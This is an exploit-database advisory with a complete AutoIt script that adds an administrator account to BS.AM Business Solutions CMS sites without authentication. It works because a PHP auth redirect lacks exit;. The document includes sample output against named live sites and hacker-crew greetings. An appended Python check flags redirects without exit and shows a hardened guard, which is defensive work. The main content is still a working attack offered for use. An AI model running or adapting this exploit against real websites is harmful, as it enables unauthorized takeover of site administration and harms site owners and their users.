BS.AM Business Solutions CMS remote add admin exploit

2013.01.11
Credit: AkaStep
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#cs
1337day.com: Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com

#########################################
I'm AkaStep member from Inj3ct0r Team
#########################################

bs_am_remote_add_admin.au3

BS.AM (BUSINESS SOLUTIONS) CMS REMOTE ADD ADMIN EXPLOIT.
THIS IS AN EXPLOIT WRITTEN IN THE AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
ON SUCCESSFUL REMOTE EXPLOITATION IT WILL ADD A NEW ADMIN TO THE TARGET SITE.

***** THIS IS A WHOLE EXPLOIT! *****
THANK YOU!

FEW DEMOS:
http://asba.am
http://doors.am

DEMO USAGE:

>poc.exe http://asba.am bigbang bigbang

##############################################################
(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: poc.exe http://site.tld username password
[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]
[@@@] Vuln & Exploit By AkaStep [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]

##################################################
Trying to add new admin:
To Site:www.asba.am
With Username: bigbang
With Password: bigbang
##################################################

##################################################
Exploit Try Count:1
##################################################
Error Count: 0
##################################################

##################################################
Exploit Try Count:2
##################################################
Error Count: 0
##################################################
Count of errors during exploitation : 0

##################################################
[*] Seems we are going to travel xD. [*]
Try to login @
Site: asba.am/cms/index.php
With Username: bigbang
With Password: bigbang
##################################################
[*] Exit [*]
##################################################

VULNERABLE CODE:
NOTICE: the script continues its execution because exit; is missing after header();
FUNNY TO SEE HOW MANY PROGRAMMERS FAIL TO UNDERSTAND THIS;)

//cms/admin.php
============SNIP BEGINS============
<?
session_start();
if ($_SESSION['login11_error'] != "no") header("Location: index.php");
include 'config.php';?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>cms::</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="css/main.css" />
<script type="text/javascript" src="javascript/jquery-1.4.2.js"></script>
<script type="text/javascript" src="javascript/admin.js"></script>
<script type="text/javascript" src="javascript/jquery-ui-1.8.11.custom.min.js"></script>
<script type="text/javascript" src="javascript/jquery.ui.datepicker-hy.js"></script>
<script type="text/javascript" src="javascript/jquery.lightbox-0.5.js"></script>
<link type="text/css" href="css/jquery-ui-1.8.11.custom.css" rel="stylesheet" />
</head>
<body>
<div id="header">
============SNIP ENDS HERE===========
#ce

#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
    '(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _
    'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _
    @CRLF & "[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _
    '[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST';
$vulnurl='cms/admin.php?lang=en&page=security';
Global $count=0,$error=0;
$cmsindent='CaptchaSecurityImages.php';
$adminpanel='/cms/index.php';

if $CmdLine[0] <> 3 Then
    MsgBox(64,"","Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://www.site.tld ' & ' username ' & 'password' & @CRLF);
    exit;
EndIf

if $CmdLine[0]=3 Then
    $targetsite=$CmdLine[1];
    $username=$CmdLine[2];
    $password=$CmdLine[3];
EndIf

if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
    ConsoleWrite('Are you kidding me?');
    Exit;
EndIf

$doublecheck=InetGet($targetsite,'',1);
if @error Then
    ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
    Exit;
EndIf

ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));
$sidentify=_INetGetSource($targetsite & $adminpanel,True);

if StringInStr($sidentify,$cmsindent) Then
    ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
    ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
    $error+=1;
EndIf

$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')

priv8($targetsite,$username,$password,$count,$error);#~ do magic for me plizzz));~#

Func priv8($targetsite,$username,$password,$count,$error)
    $count+=1;
    Global $sAddress = $targetsite
    $triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
    $whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
        $username & @CRLF & 'With Password: ' & $password & $triptrop;
    if $count <=1 then ConsoleWrite($whatcurrentlywedo)
    $doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count: ' & $error & $triptrop;
    ConsoleWrite($doitnicely);
    Global $sPostData = "username=" & $username & "&password=" & $password & "&rewrite_password=" & $password & "&ifsubmit=yes";

    if $error>=2 OR $count>=2 Then
        ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)
        if int($error)=0 then
            ConsoleWrite($triptrop & '[*] Seems we are going to travel xD. [*]' & _
                @CRLF & 'Try to login @ ' & @CRLF & _
                'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _
                $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);
            exit;
        Else
            ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _
                '[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
                '[*] May be you are Lucky;) [*]' & _
                @CRLF & 'Try to login @ ' & @CRLF & _
                'Site: ' & $targetsite & $adminpanel & @CRLF & _
                'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);
        EndIf
        exit;
    EndIf

    Global $hOpen = _WinHttpOpen("Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325)");
    Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
    Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
    _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5")
    _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
    _WinHttpAddRequestHeaders($hRequest, "DNT: 1")
    _WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300")
    _WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
    _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
    _WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
    _WinHttpSendRequest($hRequest, -1, $sPostData)
    _WinHttpReceiveResponse($hRequest)
    Global $sHeader, $sReturned

    If _WinHttpQueryDataAvailable($hRequest) Then
        $sHeader = _WinHttpQueryHeaders($hRequest)
        Do
            $sReturned &= _WinHttpReadData($hRequest)
        Until @error
        _WinHttpCloseHandle($hRequest)
        _WinHttpCloseHandle($hConnect)
        _WinHttpCloseHandle($hOpen)
        $targetsite=StringMid($targetsite,5,StringLen($targetsite))
        Sleep(1500);
        priv8($targetsite,$username,$password,$count,$error);
    Else
        $error+=1
        _WinHttpCloseHandle($hRequest)
        _WinHttpCloseHandle($hConnect)
        _WinHttpCloseHandle($hOpen)
        $targetsite=StringMid($targetsite,5,StringLen($targetsite))
        Sleep(1500);
        priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#
    EndIf
EndFunc;=> priv8();

#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep
#ce
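
Added example, not part of the original advisory or the exploit author's code: a small Python check for the flaw noted under VULNERABLE CODE, where header("Location: ...") is not followed by exit; or die; and the rest of admin.php still executes for an unauthenticated request. The function names and the hardened sample are constructed for illustration; the check assumes exit/die is the very next statement, so a comment placed between the redirect and exit is also reported.

```python
import re

REDIRECT_RE = re.compile(r"""\bheader\s*\(\s*['"]\s*Location\s*:""", re.IGNORECASE)
STOPS_RE = re.compile(r"\s*(?:exit|die)\b", re.IGNORECASE)  # statement that halts the script

def statement_end(src, start):
    """Index just past the ';' ending the statement at `start`; ';' inside quotes is ignored."""
    quote = None
    i = start
    while i < len(src):
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1              # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == ";":
            return i + 1
        i += 1
    return len(src)

def redirects_without_exit(src):
    """Line numbers of Location redirects not immediately followed by exit/die."""
    findings = []
    for m in REDIRECT_RE.finditer(src):
        if not STOPS_RE.match(src, statement_end(src, m.start())):
            findings.append(src.count("\n", 0, m.start()) + 1)
    return findings

# The guard from cms/admin.php as quoted in the advisory.
VULNERABLE = '''<?
session_start();
if ($_SESSION['login11_error'] != "no") header("Location: index.php");
include 'config.php';?>
'''

# Constructed hardened form: braces plus exit; so nothing below the guard runs.
HARDENED = '''<?php
session_start();
if (!isset($_SESSION['login11_error']) || $_SESSION['login11_error'] !== 'no') {
    header('Location: index.php');
    exit;
}
include 'config.php';
'''

print(redirects_without_exit(VULNERABLE), redirects_without_exit(HARDENED))
```

A redirect header only asks the client to go elsewhere; the server keeps running the script unless it is stopped, which is why the hardened form ends the guard with exit;.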

